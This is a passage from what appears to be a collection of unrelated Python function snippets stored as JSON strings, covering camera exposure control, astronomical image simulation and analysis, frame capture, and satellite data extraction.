hwcs.wcs_pix2world([[xcent, ycent]], 1)\n except ValueError:\n radec = np.array([[None, None]])\n else:\n radec = np.array([[None, None]])\n\n # set region\n b0 = 'point({:f} {:f}) # ' \\\n 'point=x ' \\\n 'color=green tag={{imexam}}'.format(xcent, ycent)\n self.run('regions', b0)\n b1 = 'circle({:f} {:f} {:f}) # ' \\\n 'color=green tag={{imexam}}'.format(xcent, ycent, psfr)\n self.run('regions', b1)\n if do_bg:\n b2 = 
'annulus({:f} {:f} {:f} {:f}) # ' \\\n 'color=red ' \\\n 'tag={{imexam}}'.format(xcent, ycent,\n skyrad[0], skyrad[1])\n self.run('regions', b2)\n\n self.ptable.add_row([frame, peak, xcent, ycent,\n radec[0, 0], radec[0, 1],\n mfwhm, mfwhm * ps, ellip, pa,\n final_sum, bg_avg, bg_std])\n\n self.ptable.sort(['Frame', 'Peak'])\n print_str = '\\n'.join(\n self.ptable.pformat(max_lines=-1, max_width=-1))\n log.info(f'\\nResults:\\n{print_str}\\n')", "def fix_exposure(cam, slider, verbose=False):\n margin = 10\n exp_t = MAX_EXP / 2\n cam._set_exposure(exp_t * u.milliseconds)\n time.sleep(0.5)\n print(\"Fetching Frame\")\n im = cam.latest_frame()\n x_len = len(im)\n\n right, left = MAX_EXP, 0\n inc = right / 10\n for _ in range(10):\n ## Determine if Clipping or Low-Exposure ##\n gap = 255\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n continue\n else:\n gap = min(255 - max(im[i]), gap)\n\n ## Make Appropriate Adjustment ##\n if gap == 0:\n if verbose:\n print(\"Clipping at: \", exp_t)\n right = exp_t\n elif gap > 50:\n if verbose:\n print(\"Closing gap: \", gap, \" w/ exposure: \", exp_t)\n left = exp_t\n else:\n if verbose:\n print(\"Final Exposure: \", exp_t)\n return\n\n if inc < 0.01:\n exp_t -= inc if gap == 0 else -inc\n else:\n exp_t = (right + left) / 2\n inc = (right - left) / 10\n\n slider.set_val(exp_t)\n time.sleep(1)\n im = cam.latest_frame()", "def make_fake_image(header, output='direct.fits', background=None, exptime=1.e4, nexp=10):\n hdu = pyfits.HDUList()\n \n header['EXPTIME'] = exptime\n header['NEXP'] = nexp\n header['BUNIT'] = 'ELECTRONS/S'\n \n hdu.append(pyfits.PrimaryHDU(header=header))\n \n naxis = (header['NAXIS1'], header['NAXIS2'])\n \n for name, dtype in zip(['SCI', 'ERR', 'DQ'], \n [np.float32, np.float32, np.int32]):\n hdu.append(pyfits.ImageHDU(header=header, \n data=np.zeros(np.array(naxis).T, \n dtype=dtype), name=name))\n \n if background == None:\n background = header['BACKGR']\n \n header['BACKGR'] = background\n \n ### Simple error model of read noise and sky background\n var = nexp*header['READN'] + background*exptime\n \n ### electrons / s\n rms = np.sqrt(var)/exptime\n hdu['ERR'].data += rms\n hdu['SCI'].data = np.random.normal(size=np.array(naxis).T)*rms\n \n hdu.writeto(output, clobber=True, output_verify='fix')", "def set_exptime(self, exptime):\n exptime = u.Quantity(exptime, unit=u.s)\n if not np.isscalar(exptime):\n raise TypeError('Exposure time must be an integer, a float or an Astropy Unit object')\n if exptime.value <= 0:\n raise ValueError('Exposure time can not be zero or negative')\n self.exptime = exptime.value\n try:\n if self.cycle < self.exptime:\n warnings.warn('Exposure time ({:0.4f} seconds) higher than Cycle time ({:0.4f} seconds)'.\n format(self.exptime, self.cycle))\n except:\n pass", "def main():\n NAME = os.path.basename(__file__).split(\".\")[0]\n\n # Pass/fail thresholds\n MIN_AVG_FRAME_DELTA = 30 # at least 30ms delta between frames\n MAX_VAR_FRAME_DELTA = 0.01 # variance of frame deltas\n MAX_FRAME_DELTA_JITTER = 0.3 # max ms gap from the average frame delta\n\n with its.device.ItsSession() as cam:\n props = cam.get_camera_properties()\n if not its.caps.manual_sensor(props):\n print \"Test skipped\"\n return\n\n req, fmt = its.objects.get_fastest_manual_capture_settings(props)\n caps = cam.do_capture([req]*50, [fmt])\n\n # Print out the millisecond delta between the start of each exposure\n tstamps = [c['metadata']['android.sensor.timestamp'] for c in caps]\n deltas = [tstamps[i]-tstamps[i-1] for i in 
range(1,len(tstamps))]\n deltas_ms = [d/1000000.0 for d in deltas]\n avg = sum(deltas_ms) / len(deltas_ms)\n var = sum([d*d for d in deltas_ms]) / len(deltas_ms) - avg * avg\n range0 = min(deltas_ms) - avg\n range1 = max(deltas_ms) - avg\n print \"Average:\", avg\n print \"Variance:\", var\n print \"Jitter range:\", range0, \"to\", range1\n\n # Draw a plot.\n pylab.plot(range(len(deltas_ms)), deltas_ms)\n matplotlib.pyplot.savefig(\"%s_deltas.png\" % (NAME))\n\n # Test for pass/fail.\n assert(avg > MIN_AVG_FRAME_DELTA)\n assert(var < MAX_VAR_FRAME_DELTA)\n assert(abs(range0) < MAX_FRAME_DELTA_JITTER)\n assert(abs(range1) < MAX_FRAME_DELTA_JITTER)", "def determine_exposure_time(cn, bandlims, wantSNR = 10.0, wantetime = 5.0, ref_lam = 0.550,\n plot_snr_curves = False, plot_spectrum = False,\n title = \"\"):\n\n # Specify Kat's fiducial S/N\n iref = np.argmin(np.fabs(cn.lam - ref_lam))\n\n if bandlims is not None:\n\n # Specify band via wavelength\n icont = np.array([np.argmin(np.fabs(cn.lam - bandlims[0])), np.argmin(np.fabs(cn.lam - bandlims[1]))])\n iband = np.arange(icont[0]+1, icont[1])\n ibottom = np.argmin(np.fabs(cn.Cratio - np.min(cn.Cratio[iband])))\n\n # Calculate the continuum planet photon counts and contrast ratio\n ccont = cg.observe.interp_cont_over_band(cn.lam, cn.cp, icont, iband)\n ccrat = cg.observe.interp_cont_over_band(cn.lam, cn.Cratio, icont, iband)\n\n # Calculate varies SNRs as a function of exposure time\n Nt = 1000\n times = np.linspace(1.0, 100.0, Nt)\n band_snrs = np.zeros(len(times))\n bot_snrs = np.zeros(len(times))\n cont_snrs = np.zeros(len(times))\n fid_snrs = np.zeros(len(times))\n for i, time in enumerate(times):\n cn.make_fake_data(texp = times[i])\n fid_snrs[i] = cn.SNRt[iref]\n if bandlims is not None:\n band_snrs[i] = cg.observe.SNR_band(cn.cp, ccont, cn.cb, iband, itime=times[i])\n bot_snrs[i] = cn.SNRt[ibottom]\n cont_snrs[i] = np.mean(cn.SNRt[icont])\n\n # Fit for time to desired snr value\n etime_fid = find_time_from_snr(times, fid_snrs, wantSNR) #times[np.argmin(np.fabs(fid_snrs - wantSNR))]\n if bandlims is not None:\n etime_band = find_time_from_snr(times, band_snrs, wantSNR) #times[np.argmin(np.fabs(band_snrs - wantSNR))]\n etime_bot = find_time_from_snr(times, bot_snrs, wantSNR) #times[np.argmin(np.fabs(bot_snrs - wantSNR))]\n etime_cont = find_time_from_snr(times, cont_snrs, wantSNR) #times[np.argmin(np.fabs(cont_snrs - wantSNR))]\n\n # Check for incomplete bands which can cause anomalously low exposure times\n if bandlims is None:\n etime_band = np.nan\n etime_bot = np.nan\n etime_cont = np.nan\n else:\n if (False in np.isfinite(cn.Cobs[iband])):\n etime_band = np.nan\n\n # Make plot of SNR vs exposure time\n if plot_snr_curves:\n\n fig, ax = plt.subplots(figsize = (8,6))\n ax.set_xlabel(\"Exposure Time [hrs]\")\n ax.set_ylabel(\"S/N\")\n if bandlims is not None:\n ax.plot(times, band_snrs, label = \"detect band rel. to cont.\")\n ax.plot(times, bot_snrs, label = \"bottom of band\")\n ax.plot(times, cont_snrs, label = \"avg. 
continuum\")\n ax.plot(times, fid_snrs, label = \"at %.2f $\\mu$m\" %cn.lam[iref])\n if bandlims is not None:\n ax.scatter(etime_band, wantSNR, c=\"C0\")\n ax.scatter(etime_bot, wantSNR, c=\"C1\")\n ax.scatter(etime_cont, wantSNR, c=\"C2\")\n ax.scatter(etime_fid, wantSNR, c=\"C3\")\n ax.axhline(wantSNR, ls = \"--\", c = \"grey\")\n if bandlims is not None:\n ax.axvline(etime_band, ls = \"--\", c = \"C0\")\n ax.axvline(etime_bot, ls = \"--\", c = \"C1\")\n ax.axvline(etime_cont, ls = \"--\", c = \"C2\")\n ax.axvline(etime_fid, ls = \"--\", c = \"C3\")\n ylims = ax.get_ylim()\n if bandlims is not None:\n ax.text(etime_band, ylims[1]-.5*ylims[1], \"%.2f\" %etime_band, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C0\")\n ax.text(etime_bot, ylims[1]-.1*ylims[1], \"%.2f\" %etime_bot, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C1\")\n ax.text(etime_cont, ylims[1]-.15*ylims[1], \"%.2f\" %etime_cont, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C2\")\n ax.text(etime_fid, ylims[1]-.20*ylims[1], \"%.2f\" %etime_fid, ha = \"center\", va = \"top\", fontsize = 12, bbox=dict(facecolor='w', alpha=1.0, ec = \"w\"), color = \"C3\")\n ax.legend(framealpha = 0.75, fontsize = 14)\n\n if plot_spectrum:\n\n # Construct noised spectrum plot\n if bandlims is not None:\n cn.make_fake_data(texp = etime_band)\n else:\n cn.make_fake_data(texp = etime_fid)\n\n fig, ax = plt.subplots(figsize = (8,6))\n ax.plot(cn.lam, cn.Cratio, ls = \"steps-mid\", color = \"grey\")\n ax.errorbar(cn.lam, cn.Cobs, yerr=cn.Csig, fmt = \"o\", ms = 2.0, alpha = 0.7, color = \"k\")\n ax.set_xlabel(\"Wavelength [$\\mu$m]\")\n ax.set_ylabel(\"Fp/Fs\")\n ax.set_title(title)\n\n if bandlims is not None:\n # Identify specific points in band\n for i in icont:\n ax.scatter(cn.lam[i], cn.Cratio[i], s = 20.0, c = \"C8\", marker = \"o\", zorder = 100)\n for i in iband:\n ax.scatter(cn.lam[i], cn.Cratio[i], s = 20.0, c = \"C1\", marker = \"o\", zorder = 100)\n ax.scatter(cn.lam[ibottom], cn.Cratio[ibottom], s = 20.0, c = \"C8\", marker = \"o\", zorder = 100)\n # Identify specific continuum points in band\n for i, ic in enumerate(iband):\n ax.scatter(cn.lam[ic], ccrat[i], s = 20.0, c = \"C9\", marker = \"o\", zorder = 100)\n\n # Return exposure times\n return etime_band, etime_bot, etime_cont, etime_fid", "def handle_command(log, writer, data):\n\n response = 'BAD: Invalid Command'\n commandList = data.split()\n\n try:\n if commandList[0] == 'expose':\n if len(commandList) == 3:\n if commandList[1] == 'light' or commandList[1] == 'dark' or commandList[1] == 'flat':\n expType = commandList[1]\n expTime = commandList[2]\n try:\n float(expTime)\n if float(expTime) > 0: \n expTime = float(expTime)\n fileName = exposure(expType, expTime)\n response = 'OK\\n'+'FILENAME = '+fileName\n else:\n response = 'BAD: Invalid Exposure Time'\n except ValueError:\n response = 'BAD: Invalid Exposure Time'\n elif len(commandList) == 2:\n if commandList[1] == 'bias':\n expType = commandList[1]\n try: \n fileName = exposure(expType, 0.0)\n response = 'OK\\n'+'FILENAME: '+fileName\n except ValueError:\n response = 'BAD: Invalid Exposure Time'\n elif commandList[0] == 'set':\n if len(commandList) >= 1:\n response = setParams(commandList[1:])\n except IndexError:\n response = 'BAD: Invalid Command'\n \n # tell the client the result of their command & log it\n #log.info('RESPONSE = '+response)\n 
#writer.write((response+'\\n---------------------------------------------------\\n').encode('utf-8'))\n writer.write((response+'\\nDONE\\n').encode('utf-8'))", "def write_file(req, file_type, download, dataset, stream, period, root_name):\n# ~~~~ Loading up the GRIB file~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n head, _ = path.splitext(root_name)\n\n if file_type == 'grib':\n\n if download:\n raise TelemacException(\\\n '... I am not programmed to '\n 'download grib files directly.\\n\\n')\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nLoading essentials from the GRIB\\n')\n grb2slf = Grib(dataset, req, stream)\n\n grb2slf.set_geometry()\n\n if stream == 'spec':\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nSpecial case for spectral file\\n')\n grb2slf.put_geometry('geo_'+head+'.slf')\n grb2slf.set_spectral()\n\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nConverting grib file(s) into SELAFIN\\n')\n grb2slf.put_content(root_name)\n\n# <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n# ~~~~ Downloading the NetCDF file ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Unfortunately, I did not manage to access the NetCDF file remotely\n elif file_type == 'netcdf':\n\n ecmwf2slf = Ecmwf(period, req)\n if download:\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nMaking an ECMWF request\\n')\n ecmwf2slf.connect_to_ecmwf(\"datasets/%s\" % (req['dataset']))\n\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nHaving to download the ECMWF file first\\n')\n ecmwf2slf.download_ecmwf()\n print(\" ~> download completed.\")\n\n ecmwf2slf.open_ecmwf()\n ecmwf2slf.set_geometry()\n\n if stream == 'spec':\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nSpecial case for spectral file\\n')\n ecmwf2slf.put_geometry('geo_'+head+'.slf')\n ecmwf2slf.set_spectral()\n\n print('\\n\\n'+72*'~'+'\\n')\n print('\\nConverting netcdf file into SELAFIN\\n')\n ecmwf2slf.put_content(root_name, stream)", "def query_frame(self):\n x, y = N.ogrid[0:self._resolution[1], 0:self._resolution[0]]\n x0, y0 = int(self._resolution[1] / 2), int(self._resolution[0] / 2)\n r = N.hypot(x - x0, y - y0)\n w0 = 75.0\n self.frame = N.array(N.exp(-r ** 2 / w0 ** 2) * 60000, dtype=N.uint16)\n self.frame += N.random.uniform(low=0, high=5535, size=self._resolution[::-1])", "def configure_area_det_expo(exposure):\n det = xpd_configuration[\"area_det\"]\n yield from bps.abs_set(\n det.cam.acquire_time, glbl[\"frame_acq_time\"], wait=True\n )\n acq_time = det.cam.acquire_time.get()\n _check_mini_expo(exposure, acq_time)\n # compute number of frames\n num_frame = np.ceil(exposure / acq_time)\n yield from bps.abs_set(det.images_per_set, num_frame, wait=True)\n computed_exposure = num_frame * acq_time\n # print exposure time\n print(\n \"INFO: requested exposure time = {} - > computed exposure time\"\n \"= {}\".format(exposure, computed_exposure)\n )\n return num_frame, acq_time, computed_exposure", "def exposure(cls, *args):\n return cls.path_finder('exposure', *args)", "def exposure(cls, *args):\n return cls.path_finder('exposure', *args)", "def _generate_direct_image(self):\n filename = '0000_flt.fits'\n\n di_start_JD = (self.exp_start_times[0] - 1 * u.min).to(u.day)\n di_exp_gen = ExposureGenerator(self.detector, self.grism, self.NSAMP,\n self.SAMPSEQ, self.SUBARRAY,\n self.planet, filename, di_start_JD)\n\n try: # assume that its a list not a single value\n x_ref = self.x_ref[0]\n except TypeError:\n x_ref = self.x_ref\n\n try: # assume that its a list not a single value\n y_ref = self.y_ref[0]\n except TypeError:\n y_ref = self.y_ref\n\n exp = 
di_exp_gen.direct_image(x_ref, y_ref)\n exp.generate_fits(self.outdir, '0000_flt.fits')", "def send_jpg_frame_REP_watcher(self, text, image):\n\n ret_code, jpg_buffer = cv2.imencode(\n \".jpg\", image, [int(cv2.IMWRITE_JPEG_QUALITY),\n self.jpeg_quality])\n self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now\n try:\n hub_reply = self.sender.send_jpg(text, jpg_buffer)\n except: # add more specific exception, e.g. ZMQError, after testing\n print(\"Exception at sender.send_jpg in REP_watcher function.\")\n self. fix_comm_link()\n self.REP_recd_time.append(datetime.utcnow())\n return hub_reply", "def stream_frames(video_capture):", "def capture(self, channel: LC):\n\n # check if gain information is available, if not, update first\n if \"d2d\" not in self.config:\n self.setup_d2d()\n self.update()\n\n # turn on the light\n self.light_control(channel, 1)\n\n # assemble the terminal command\n path_to_bright = os.getcwd() + \"/cam/tmp/bright.bmp\"\n path_to_dark = os.getcwd() + \"/cam/tmp/dark.bmp\"\n gain = self.config[\"d2d\"][channel][\"analog-gain\"] * self.config[\"d2d\"][channel][\"digital-gain\"]\n\n photo_cmd = \"raspistill -e bmp -w {} -h {} -ss {} -t 1000 -awb off -awbg {},{} -ag {} -dg {}\".format(self.settings.resolution[0], self.settings.resolution[1], self.settings.shutter_speed[channel], self.config[\"wb\"][channel][\"r\"], self.config[\"wb\"][channel][\"b\"], self.config[\"d2d\"][channel][\"analog-gain\"], self.config[\"d2d\"][channel][\"digital-gain\"])\n\n # run command and take bright and dark picture\n # start the bright image capture by spawning a clean process and executing the command, then waiting for the q\n p = mp.Process(target=photo_worker, args=(photo_cmd + \" -o {}\".format(path_to_bright),))\n try:\n p.start()\n p.join()\n except OSError:\n d_print(\"Could not start child process, out of memory\", 3)\n return (None, 0)\n # turn off the light\n self.light_control(channel, 0)\n # start the dark image capture by spawning a clean process and executing the command, then waiting for the q\n p = mp.Process(target=photo_worker, args=(photo_cmd + \" -o {}\".format(path_to_dark),))\n try:\n p.start()\n p.join()\n except OSError:\n d_print(\"Could not start child process, out of memory\", 3)\n return (None, 0)\n\n # load the images from file, perform dark frame subtraction and return the array\n bright = Image.open(path_to_bright)\n rgb = np.array(bright)\n if channel != LC.GROWTH:\n dark = Image.open(path_to_dark)\n rgb = cv2.subtract(rgb, np.array(dark))\n\n # if the time since last update is larger than a day, update the gains after the photo\n if time.time() - self.config[\"d2d\"][\"timestamp\"] > 3600*24:\n self.update()\n\n return (rgb, gain)", "def write(self, command):\n self.meas.write(bytes(command, \"utf8\"))", "def object(s='object'):\n s = s.strip()[:80] #truncate to 80 char to fit in FITS header\n print camera.SetShutter(0)\n camera.status.imgtype = 'OBJECT'\n camera.status.object = s\n camera.status.update()", "def command(self):\n saw_error = False\n try:\n analog_gain = float(self.value_analog.get())\n except:\n print(\"analog must be floating point value\")\n self.value_analog.set(str(self.tcp_comms.tcp_params.analog_gain_target))\n saw_error = True\n try:\n digital_gain = float(self.value_digital.get())\n except:\n print(\"digital must be floating point value\")\n self.value_digital.set(str(self.tcp_comms.tcp_params.digital_gain_target))\n saw_error = True\n try:\n analog_tol = float(self.value_analog_tol.get())\n except:\n print(\"analog 
tol must be floating point value\")\n self.value_analog_tol.set(str(self.tcp_comms.tcp_params.analog_gain_tol))\n saw_error = True\n try:\n digital_tol = float(self.value_digital_tol.get())\n except:\n print(\"digital tol must be floating point value\")\n self.value_digital_tol.set(str(self.tcp_comms.tcp_params.digital_gain_tol))\n saw_error = True\n if not saw_error:\n self.tcp_comms.tcp_params.analog_gain_target = analog_gain\n self.tcp_comms.tcp_params.digital_gain_target = digital_gain\n self.tcp_comms.tcp_params.analog_gain_tol = analog_tol\n self.tcp_comms.tcp_params.digital_gain_tol = digital_tol\n self.tcp_comms.send_freeze_exposure(analog_gain, analog_tol, digital_gain, digital_tol)", "def get_image(id, frame=\"ICRS\", survey=\"DSS\", cmap=\"gray\", fov=1.0):\n\n id = id\n frame = frame\n survey = survey\n cmap = cmap\n\n # instantiate target object\n tgt = Target(id=id, frame=frame, survey=survey)\n\n # resolve target name, if this fails, quit execution and return the error code\n code = tgt.resolve_name()\n if code != 0:\n return(1)\n \n # make hips2fits query to be placed in url\n query_params = {\n 'hips': tgt.survey,\n 'object': tgt.id,\n 'ra': tgt.coords.ra.value,\n 'dec': tgt.coords.dec.value,\n 'fov': (fov * u.deg).to(u.deg).value,\n 'width': 500,\n 'height': 500,\n }\n\n url = f'http://alasky.u-strasbg.fr/hips-image-services/hips2fits?{urlencode(query_params)}'\n try:\n # try grabbing the fits file and plotting it.\n hdu = fits.open(url)\n\n im = hdu[0].data\n\n fig = plt.figure()\n ax=plt.gca()\n ax.imshow(im, origin='lower', cmap=cmap)\n plt.title(f\"{tgt.main_id}: {tgt.survey}\")\n fig.savefig(\"fig.jpg\", dpi=200)\n return(0)\n except Exception as e:\n # if the above failed, print the error and quit\n print(e)\n return(1)", "def GEEviMODIS(ptsFile,metric,timeStep,buf,poly,QC, username,folderOut, scalePix = 250,startYear = None,endYear = None):\n \n # load required libraries\n import ee\n import math\n \n # Initialize the Earth Engine object, using the authentication credentials.\n ee.Initialize()\n\n ID_field = \"geeID\"\n\n #load pts or poly file\n pts1 = ee.FeatureCollection('users/' + username + '/' + str(ptsFile))\n \n #Computes the bits we need to extract.\n def getQABits(image, start, end, newName):\n pattern = 0\n listB = list(range(start, end+1))\n for one in listB:\n pattern += math.pow(2, one)\n pattern = int(pattern)\n \n return (image.select([0], [newName])\n .bitwiseAnd(pattern)\n .rightShift(start))\n\n time_d = {}\n time_d['lowest'] = 'rl'\n time_d['month'] = 'rm'\n time_d['year'] = 'ry'\n\n lastImage = ee.Image(ee.ImageCollection('MODIS/006/MOD13Q1')\n .sort('system:time_start',False)\n .first())\n lastImageDate = lastImage.get('system:index').getInfo()\n\n firstImage = ee.Image(ee.ImageCollection('MODIS/006/MOD13Q1')\n .sort('system:time_start',True)\n .first())\n firstImageDate = firstImage.get('system:index').getInfo()\n \n if all([startYear is None,endYear is None]):\n startYear = int(firstImageDate[0:4])\n endYear = int(lastImageDate[0:4])\n startMonth = int(firstImageDate[5:7])\n endMonth = int(lastImageDate[5:7])-1\n startYearAll = startYear + 1\n endYearAll = endYear - 1\n\n years = list(range(startYear, endYearAll + 1))\n monthsEE = ee.List(list(range(startMonth,(12*len(years)+endMonth))))\n yearsEE = ee.List(list(range(startYearAll, endYearAll + 1)))\n \n elif all([startYear >= 0,endYear >= 0]):\n startYearReal = int(firstImageDate[0:4])\n endYearReal = int(lastImageDate[0:4]) \n \n years = list(range(max(startYearReal,startYear), 
(min(endYearReal,endYear) + 1)))\n \n if endYear >= endYearReal:\n endMonth = int(lastImageDate[5:7])-1\n endYearReal2 = endYearReal-1\n years2 = len(years)-1\n elif endYear < endYearReal:\n endMonth = 0\n endYearReal2 = endYearReal\n years2 = len(years)\n \n if startYear <= startYearReal:\n startMonth = int(firstImageDate[5:7])\n startYearReal2 = startYearReal+1\n elif startYear > startYearReal:\n startMonth = 0\n startYearReal2 = startYearReal\n \n monthsEE = ee.List(list(range(startMonth,(12*years2+endMonth))))\n yearsEE = ee.List(list(range(max(startYearReal2,startYear), (min(endYearReal2,endYear) + 1))))\n \n for met in metric:\n modisVI = ee.ImageCollection('MODIS/006/MOD13Q1')\n metL = [met]\n def maskbyBits1(img):\n QA = img.select('DetailedQA')\n QA1 = getQABits(QA, 0, 1, 'QA')\n QA2 = getQABits(QA, 2, 5, 'QA')\n QA3 = getQABits(QA, 6, 7, 'QA')\n QA4 = getQABits(QA, 8, 8, 'QA')\n QA5 = getQABits(QA, 10, 10, 'QA')\n QA6 = getQABits(QA, 15, 15, 'QA')\n mask = QA1.lt(2).And(QA2.lt(12)).And(QA3.neq(3)).And(QA3.neq(0)).And(QA4.eq(0)).And(QA5.eq(0)).And(QA6.eq(0))\n return img.updateMask(mask)\n \n def maskbyBits2(img):\n QA = img.select('DetailedQA')\n QA1 = getQABits(QA, 0, 1, 'QA')\n mask = QA1.eq(0)\n return img.updateMask(mask)\n \n if QC == 'None':\n modisVIn = modisVI.select(met)\n elif QC == 'Op1':\n modisVIn = modisVI.map(maskbyBits1).select(met)\n elif QC == 'Op2': \n modisVIn = modisVI.map(maskbyBits2).select(met)\n\n def scale1(img):\n return (img.select(metL[0])\n .float()\n .multiply(0.0001)\n .copyProperties(img,['system:time_start','system:time_end']))\n\n if timeStep == 'year':\n\n def map_m(i):\n i = ee.Number(i).int()\n image2 = (modisVIn\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .first())\n filtered = (modisVIn\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col1 = ee.ImageCollection(yearsEE.map(map_m).flatten())\n\n elif timeStep == 'month':\n \n def map_m(i):\n i = ee.Number(i)\n y = i.divide(12).add(years[0]).int()\n m = i.mod(12).add(1)\n image2 = (modisVIn\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .first())\n filtered = (modisVIn\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col1 = ee.ImageCollection(monthsEE.map(map_m).flatten())\n \n elif all([timeStep == 'lowest',endYear is None, startYear is None]):\n\n img_col1 = modisVIn\n \n elif all([timeStep == 'lowest',endYear > 0, startYear > 0]):\n\n img_col1 = modisVIn.filter(ee.Filter.calendarRange(startYear, endYear, 'year'))\n\n #else:\n #print(\"incorrect time step specified\")\n \n img_col = img_col1.map(scale1)\n \n if buf > 0:\n bufL = [buf]\n def bufferPoly(feature):\n return feature.buffer(bufL[0])\n\n ptsB = pts1.map(bufferPoly)\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = ptsB.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = 
time_d[timeStep]+'_MOD13Q1_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_ptsB',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('buffered pts by:' + str(buf) + ' for: ' + met)\n\n elif poly > 0:\n \n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD13Q1_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_poly1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('spatial mean in poly: no buffer for: ' + met)\n\n else:\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD13Q1_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_pts1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n #print('value at point: no buffer for: ' + met)", "def autoExposure(this, **kargs):\n\t\t\n\t\t# Arguments\n\t\tframes = kargs.get('frames', 4)\n\t\tstart = kargs.get('start', -10)\n\t\tend = kargs.get('start', -3)\n\t\t\n\t\tmax = 0\n\t\tv = start\n\t\tprint 'Auto Exposition starting...'\n\t\t\n\t\tfor i in range(start, end):\n\t\t\tthis.setProp('exposure', i)\n\t\t\tfor j in range(frames): this.getFrame()\n\t\t\t\n\t\t\te = imEntropy(this.frame)\n\t\t\tif e > max:\n\t\t\t\tmax = e\n\t\t\t\tv = i\n\t\t\n\t\tthis.setProp('exposure', v)\n\t\tfor j in range(frames): this.getFrame()\n\t\tprint 'Exposure Calibrated: %i / Entropy: %.4f' % (v, max)", "def send_image_frame_REP_watcher(self, text, image):\n\n self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now\n try:\n hub_reply = self.sender.send_image(text, image)\n except: # add more specific exception, e.g. ZMQError, after testing\n print(\"Exception at sender.send_image in REP_watcher function.\")\n self. 
fix_comm_link()\n self.REP_recd_time.append(datetime.utcnow())\n return hub_reply", "def extract_hrc_evt2(obsid):\n#\n#--- write required arc4gl command\n#\n line = 'operation=retrieve\\n'\n line = line + 'dataset=flight\\n'\n line = line + 'detector=hrc\\n'\n line = line + 'level=2\\n'\n line = line + 'filetype=evt2\\n'\n line = line + 'obsid=' + str(obsid) + '\\n'\n line = line + 'go\\n'\n f = open(zspace, 'w')\n f.write(line)\n f.close()\n\n cmd1 = \"/usr/bin/env PERL5LIB=\"\n cmd2 = ' echo ' + hakama + ' |arc4gl -U' + dare + ' -Sarcocc -i' + zspace\n cmd = cmd1 + cmd2\n\n#\n#--- run arc4gl\n#\n bash(cmd, env=ascdsenv)\n mcf.rm_file(zspace)\n#\n#--- check the data is actually extracted\n#\n cmd = 'ls *'+ str(obsid) + '*evt2.fits.gz >' + zspace\n os.system(cmd)\n f = open(zspace, 'r')\n data = [line.strip() for line in f.readlines()]\n f.close()\n mcf.rm_file(zspace)\n\n if len(data) > 0:\n os.system('gzip -d *.gz')\n file = data[0]\n file = file.replace('.gz', '')\n return file\n else:\n return 'na'", "def stopcam_expose():\n\n\trespond = send_command('stopcam')", "def redo(self, channel, image):\n pass", "def GEEetMODIS(ptsFile,metric,timeStep,buf,poly,QC,username,folderOut, scalePix = 1000, startYear = None, endYear = None):\n \n # load required libraries\n import ee\n import math\n \n # Initialize the Earth Engine object, using the authentication credentials.\n ee.Initialize()\n\n ID_field = \"geeID\"\n\n #load pts or poly file\n pts1 = ee.FeatureCollection('users/' + username + '/' + str(ptsFile))\n \n #Computes the bits we need to extract.\n def getQABits(image, start, end, newName):\n pattern = 0\n listB = list(range(start, end+1))\n for one in listB:\n pattern += math.pow(2, one)\n pattern = int(pattern)\n \n return (image.select([0], [newName])\n .bitwiseAnd(pattern)\n .rightShift(start))\n\n time_d = {}\n 